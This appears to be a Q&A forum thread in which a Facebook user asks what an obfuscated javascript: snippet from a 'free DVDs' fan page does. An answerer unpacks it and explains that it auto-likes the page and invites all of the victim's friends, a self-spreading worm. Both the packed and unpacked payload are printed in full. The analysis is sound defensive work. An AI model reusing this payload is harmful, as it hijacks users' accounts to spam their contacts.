CODEWITHSUNDEEP
javascriptfacebook
Stuart
Stuart

Reputation: 19

Facebook javascript

A 'friend' on Facebook suggested I become a fan of some video library to get free DVDs and on their fan page under the 'FREE DVDs' tab it had some code it asked users to copy and paste into the address bar.

I am wondering if anyone knows what this code would do just by looking at it. I guess I need to be logged into Facebook for it to work but I don't want to paste it, in the case it was malicious and spammed all my other Facebook friends.

Can anyone tell?

javascript:(function(){a='app113639355344735_ncpCAE';b='app113639355344735_RWwtnR';WGOEjW='app113639355344735_WGOEjW';zsbTwe='app113639355344735_zsbTwe';wwEggB='app113639355344735_wwEggB';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|wwEggB|fs|SocialGraphManager|zsbTwe|WGOEjW|||||||'.split('|'),0,{}))})();

Upvotes: 1

Views: 553

Answers (1)

Sean Kinsey
Sean Kinsey

Reputation: 38046

This is compressed using p.a.c.k.e.r You can use tools like http://jsbeautifier.org/ to unpack it

a = 'app113639355344735_ncpCAE';
b = 'app113639355344735_RWwtnR';
WGOEjW = 'app113639355344735_WGOEjW';
zsbTwe = 'app113639355344735_zsbTwe';
wwEggB = 'app113639355344735_wwEggB';
d = document;
d['getElementById'](wwEggB)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
setTimeout(function () {
    fs['select_all']()
}, 5000);
setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
    m['dispatchEvent'](c);
    d['getElementById'](zsbTwe)['innerHTML'] = d['getElementById'](WGOEjW)['value']
}, 5000);

As you can see, this opens up an invide dialog, selects all friends and issues a click event so as to run the invitation - in short, its a worm.

Upvotes: 8

Related Questions